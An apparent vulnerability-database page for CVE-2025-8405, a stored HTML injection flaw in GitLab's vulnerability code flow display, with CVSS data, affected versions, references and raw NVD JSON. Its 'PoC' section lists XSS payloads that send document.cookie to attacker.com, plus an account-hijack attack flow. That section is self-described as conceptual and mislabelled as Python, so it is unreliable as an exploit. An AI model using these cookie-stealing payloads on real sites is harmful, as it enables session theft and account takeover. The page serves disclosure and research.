CVE-2025-8405

Description

GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

GitLab CE/EE 17.1 到 18.4.6 之前的所有版本

GitLab CE/EE 18.5 到 18.5.4 之前的所有版本

GitLab CE/EE 18.6 到 18.6.2 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-8405 PoC - GitLab HTML Injection in Vulnerability Code Flow
// This PoC demonstrates the HTML injection vulnerability in GitLab's vulnerability reporting feature

// Note: This is a conceptual PoC based on the vulnerability description.
// Actual exploitation requires a valid GitLab account with permission to create vulnerability reports.

// Malicious payload that could be injected into the vulnerability code flow:
const maliciousPayload = {
  title: 'Test Vulnerability',
  description: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>',
  // Alternative payloads:
  alternativePayloads: [
    '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">',
    '<svg onload="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">',
    '<a href="javascript:fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">Click me</a>'
  ]
};

// Attack flow:
// 1. Attacker creates a new vulnerability report with malicious HTML/JS payload
// 2. Payload is stored in GitLab database without proper sanitization
// 3. When victim views the vulnerability report, payload executes in victim's browser
// 4. Attacker steals victim's session cookie
// 5. Attacker hijacks victim's account

console.log('CVE-2025-8405 PoC - HTML Injection in GitLab Vulnerability Code Flow');
console.log('Affected Versions: GitLab CE/EE 17.1 to <18.4.6, 18.5 to <18.5.4, 18.6 to <18.6.2');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-8405
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-8405
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-8405/
[4] VulDB https://vuldb.com/cve/CVE-2025-8405
[5] https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/issues/558214
[7] https://hackerone.com/reports/3270940

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-8405", "sourceIdentifier": "[email protected]", "published": "2025-12-11T05:16:38.447", "lastModified": "2025-12-23T21:01:48.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "8B96998F-2DA2-48A0-A574-C192E218F193"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "293FA588-D122-4DCC-BD11-47FE16216D5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "457DB333-60BE-44CD-A674-216AB658E14E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "910967DB-0A8C-4436-9D9E-37BD610E7367"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "919A2588-3EA1-4E15-B47E-61B3E14B2781"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "6343A083-3E1C-4551-B230-76CABC3FDD67"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/558214", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3270940", "source": "[email protected]", "tags": ["Permissions Required"]}]}}